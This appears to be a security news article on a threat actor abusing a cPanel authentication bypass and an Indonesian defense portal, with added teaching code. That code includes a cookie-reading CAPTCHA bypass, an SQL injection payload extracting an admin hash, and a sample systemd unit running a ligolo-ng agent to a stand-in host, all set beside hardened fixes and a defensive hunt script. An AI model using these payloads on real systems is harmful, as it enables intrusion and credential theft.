Threat Actor Exploits cPanel Vulnerability to Target Government, Military, and MSPs in Southeast Asia
A newly identified threat actor is actively exploiting a critical vulnerability in **cPanel** (**CVE-2026-41940**) to target government and military entities in Southeast Asia, as well as managed service providers (MSPs) and hosting providers. The attacks leverage publicly available proof-of-concept exploits to gain elevated control of vulnerable systems.
## cPanel Authentication Bypass Exploited in Targeted Attacks
Researchers at **Ctrl-Alt-Intel** detected a campaign abusing **CVE-2026-41940**, a critical authentication bypass in **cPanel** and WebHost Manager (WHM), on May 2, 2026. The flaw lets a remote attacker bypass the control panel's login and gain elevated control of the control panel.

The attacks originate from the IP address `95.111.250[.]175` and primarily target government and military domains in the Philippines (`*.mil.ph` and other `*.ph` domains) and Laos (`*.gov.la`), alongside MSPs and hosting providers. The attackers are using publicly available proof-of-concept (PoC) exploits published on GitHub rather than a custom exploit.
## Indonesian Defense Portal Targeted with Custom Exploit Chain
Prior to the **cPanel** attacks, the same threat actor used a separate, custom exploit chain against an Indonesian defense-sector training portal. The chain combined an authenticated SQL injection with remote code execution; because the injection required a logged-in session, the attacker must already have held valid credentials for the portal.
"The script uses hard-coded credentials and defeats the portal's CAPTCHA by reading the expected CAPTCHA value out of the server-issued session cookie rather than solving the challenge normally," **Ctrl-Alt-Intel** stated.
"Once authenticated and passing the CAPTCHA, the actor moves to a document-management function. The vulnerable parameter is the field used to save a document name, and the script injects SQL into that field when posting to the document-save endpoint."
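The two weaknesses the quoted analysis describes, a CAPTCHA whose expected answer is readable from the client's own session cookie and a document-save endpoint that splices the document name into SQL, are common enough to show generically. The following Python is an added illustration written for this page, not Ctrl-Alt-Intel's script or the portal's code; the signing key, the schema, the `users`/`documents` tables and the payload string are all constructed for the example. Each weak form is placed beside a hardened one.

```python
"""Added illustration (not Ctrl-Alt-Intel's or the portal's code):
  1. CAPTCHA answer stored in a signed-but-unencrypted session cookie, so the
     client can simply read it, versus an opaque server-side token.
  2. Document-save handler that interpolates the name into SQL, versus a
     parameterized statement.
Keys, schema, sample rows and the payload are constructed for this example."""
import base64
import hashlib
import hmac
import json
import secrets
import sqlite3

SIGNING_KEY = b"example-signing-key"  # constructed; a real app uses a random secret


# --- 1. CAPTCHA state kept in the cookie ------------------------------------

def issue_captcha_weak():
    """Weak design: the expected answer rides in a signed cookie. Signing
    prevents tampering, not reading, so the client can recover it."""
    answer = secrets.token_hex(3).upper()          # shown to the user as an image
    payload = base64.urlsafe_b64encode(json.dumps({"captcha": answer}).encode())
    sig = hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()
    return answer, payload.decode() + "." + sig


def read_answer_from_cookie(cookie):
    """What an attacker's script does instead of solving the image."""
    payload = cookie.split(".", 1)[0]
    return json.loads(base64.urlsafe_b64decode(payload))["captcha"]


def weak_captcha_is_bypassable():
    answer, cookie = issue_captcha_weak()
    return read_answer_from_cookie(cookie) == answer


_CAPTCHA_STORE = {}  # server-side store keyed by opaque token (stand-in for a DB)


def issue_captcha_hardened():
    """Hardened design: the cookie carries only an opaque token; the answer
    never leaves the server and is consumed on first check."""
    answer = secrets.token_hex(3).upper()
    token = secrets.token_urlsafe(16)
    _CAPTCHA_STORE[token] = answer
    return answer, token


def check_captcha_hardened(token, submitted):
    expected = _CAPTCHA_STORE.pop(token, None)   # one-shot: no replay of a solved token
    return expected is not None and hmac.compare_digest(expected, submitted)


def hardened_captcha_roundtrip():
    """Returns (first check, replay of the same token) -> expected (True, False)."""
    answer, token = issue_captcha_hardened()
    return check_captcha_hardened(token, answer), check_captcha_hardened(token, answer)


# --- 2. SQL injection via the document-name field ---------------------------

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(name TEXT, password_hash TEXT)")
    conn.execute("CREATE TABLE documents(name TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'hash-of-admin-password')")  # constructed
    return conn


def save_document_vulnerable(conn, name):
    """Splices the user-controlled name straight into the statement."""
    conn.execute(f"INSERT INTO documents(name) VALUES ('{name}')")


def save_document_safe(conn, name):
    """Parameterized: the driver passes the name as data, never as SQL."""
    conn.execute("INSERT INTO documents(name) VALUES (?)", (name,))


def stored_names(conn):
    return [row[0] for row in conn.execute("SELECT name FROM documents")]


# Constructed payload: SQLite string concatenation pulls another table's data
# into the saved name, which the attacker then reads back from the document list.
INJECTION = "report' || (SELECT password_hash FROM users WHERE name='admin') || '"


def demo_document_save(save_fn):
    conn = make_db()
    save_fn(conn, INJECTION)
    return stored_names(conn)


if __name__ == "__main__":
    print("weak CAPTCHA bypassed:", weak_captcha_is_bypassable())
    print("hardened (first, replay):", hardened_captcha_roundtrip())
    print("vulnerable save stored:", demo_document_save(save_document_vulnerable))
    print("safe save stored:", demo_document_save(save_document_safe))
```

The CAPTCHA half is the more instructive one: many web frameworks sign session cookies without encrypting them, so any value placed in the session is visible to whoever holds the cookie, and a script that decodes it never has to solve the image. The fix is not a stronger signature but keeping the answer server-side behind an opaque, single-use token. For the SQL half, the vulnerable form stores the admin's hash inside the document name, while the parameterized form stores the payload as an inert string.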

## AdaptixC2 Framework and Persistent Access
Analysis shows that the threat actor uses the **AdaptixC2** command-and-control (C2) framework to remotely control compromised endpoints. OpenVPN and the Ligolo tunnelling tool are also deployed to keep a persistent foothold inside victim networks.
"The actor built a durable access layer using OpenVPN, Ligolo, systemd persistence, and then used that access to pivot into an internal network and exfiltrate a substantial corpus of Chinese railway-sector documents," **Ctrl-Alt-Intel** added.
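A defender reading the quote above will want a way to find that kind of durable access layer on their own hosts. The Python below is an added hunt heuristic written for this page, not Ctrl-Alt-Intel's indicators or tooling: it parses systemd unit files and flags any `ExecStart=` that launches a binary from outside package-managed paths, that carries the `-connect`/`-ignore-cert` flags of the ligolo-ng agent, or that wraps such a command in `sh -c`. The three unit files, their paths and the `203.0.113.10` address are constructed sample data.

```python
"""Added hunt heuristic (not Ctrl-Alt-Intel's IoCs): flag systemd units whose
ExecStart runs a tunnelling/VPN binary from a non-package location or with
ligolo-ng agent flags. All unit texts and paths below are constructed."""
import shlex

# Constructed sample unit files, as they might be read from /etc/systemd/system.
SAMPLE_UNITS = {
    "openvpn-client@office.service": """[Unit]
Description=OpenVPN tunnel for office
[Service]
ExecStart=/usr/sbin/openvpn --suppress-timestamps --config office.conf
[Install]
WantedBy=multi-user.target
""",
    "sysmon-update.service": """[Unit]
Description=System monitor update
After=network-online.target
[Service]
ExecStart=/dev/shm/.cache/agent -connect 203.0.113.10:11601 -ignore-cert
Restart=always
RestartSec=10
[Install]
WantedBy=multi-user.target
""",
    "net-helper.service": """[Service]
ExecStart=/bin/sh -c "/home/www/.config/openvpn --config /home/www/.config/c.ovpn"
Restart=always
""",
}

# Locations a package manager installs into; anything else is worth a look.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/",
                    "/bin/", "/sbin/")
# Flags used by the ligolo-ng agent to dial back to its proxy.
LIGOLO_FLAGS = {"-connect", "-ignore-cert"}


def exec_start_commands(unit_text):
    """Yield argv for every ExecStart= line, also unwrapping 'sh -c "..."'."""
    for line in unit_text.splitlines():
        line = line.strip()
        if not line.startswith("ExecStart="):
            continue
        cmd = line.split("=", 1)[1].lstrip("-@+!:")   # drop systemd exec prefixes
        argv = shlex.split(cmd)
        yield argv
        if len(argv) >= 3 and argv[0].endswith("sh") and argv[1] == "-c":
            yield shlex.split(argv[2])                # the real command inside -c


def assess_unit(unit_text):
    """Return a list of human-readable reasons the unit looks like persistence."""
    reasons = []
    for argv in exec_start_commands(unit_text):
        if not argv:
            continue
        binary = argv[0]
        if binary.startswith("/") and not binary.startswith(TRUSTED_PREFIXES):
            reasons.append(f"ExecStart binary outside package paths: {binary}")
        if LIGOLO_FLAGS & set(argv):
            reasons.append(f"ligolo-ng agent flags present: {' '.join(argv)}")
    # Restart=always on an already-suspicious unit is the 'durable' part.
    if reasons and "Restart=always" in unit_text:
        reasons.append("Restart=always keeps the tunnel up across kills")
    return reasons


def hunt(units):
    """Map unit name -> reasons, for units that raised at least one reason."""
    findings = {}
    for name, text in units.items():
        reasons = assess_unit(text)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_UNITS).items():
        print(name)
        for r in reasons:
            print("   -", r)
```

Run against a real host, the `SAMPLE_UNITS` dict would be replaced by reading `/etc/systemd/system/*.service` and the per-user `~/.config/systemd/user/` directories; the legitimate `openvpn-client@office.service` produces no finding because its binary lives under `/usr/sbin/`, while the other two are flagged for world-writable or home-directory paths. The path heuristic is deliberately crude and should be tuned to the host's own deployment conventions.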
## Widespread Exploitation and Mitigation
The identity of the threat actor remains unknown, and it is not the only party exploiting the bug. **Censys** reported evidence of multiple third parties weaponizing the **cPanel** vulnerability within 24 hours of its public disclosure, including the deployment of **Mirai** botnet variants and a ransomware strain called Sorry.
According to the Shadowserver Foundation, approximately 44,000 IP addresses compromised via **CVE-2026-41940** were involved in scanning and brute-force attacks on April 30, 2026; that number had fallen to 3,540 by May 3, 2026.
**cPanel** has released an updated detection script that reduces false positives. Administrators are strongly advised to apply the available patches immediately, run the detection script, and follow cPanel's recommended cleanup procedures if indicators of compromise (IoCs) are found.